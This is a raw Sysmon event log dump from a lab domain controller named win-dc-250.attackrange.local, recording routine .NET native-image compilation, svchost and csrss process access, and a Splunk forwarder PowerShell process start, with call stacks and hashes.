13:25:17.836{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-463D-6000-8503-000000009A01}1036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007723Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:17.804{08A6967A-463D-6000-8303-000000009A01}3460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\d84-0\Microsoft.GroupPolicy.ServerAdminTools.GpmgmtLib.dll2021-01-14 13:25:17.804 10341000x80000000000000007722Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.757{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-463D-6000-8403-000000009A01}3056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007721Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.757{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007720Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.757{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007719Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.757{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007718Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.757{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007717Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.757{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007716Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.757{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007715Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.757{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007714Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.757{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007713Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.757{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007712Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.757{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-463D-6000-8403-000000009A01}3056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007711Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.757{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-463D-6000-8403-000000009A01}3056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007710Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.758{08A6967A-463D-6000-8403-000000009A01}3056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007709Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.711{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-463D-6000-8303-000000009A01}3460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007708Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.695{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-463D-6000-8303-000000009A01}3460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007707Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.695{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-463D-6000-8303-000000009A01}3460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007706Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.664{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-463D-6000-8203-000000009A01}4764C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007705Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.648{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-463D-6000-8203-000000009A01}4764C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007704Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.648{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-463D-6000-8203-000000009A01}4764C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007703Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:17.617{08A6967A-463D-6000-8103-000000009A01}4200C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1068-0\Microsoft.GroupPolicy.Management.Interop.dll2021-01-14 13:25:17.617 10341000x80000000000000007702Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.523{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-463D-6000-8103-000000009A01}4200C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007701Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.507{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-463D-6000-8103-000000009A01}4200C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007700Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.507{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-463D-6000-8103-000000009A01}4200C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007699Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:17.461{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-463D-6000-8003-000000009A01}4676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007698Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 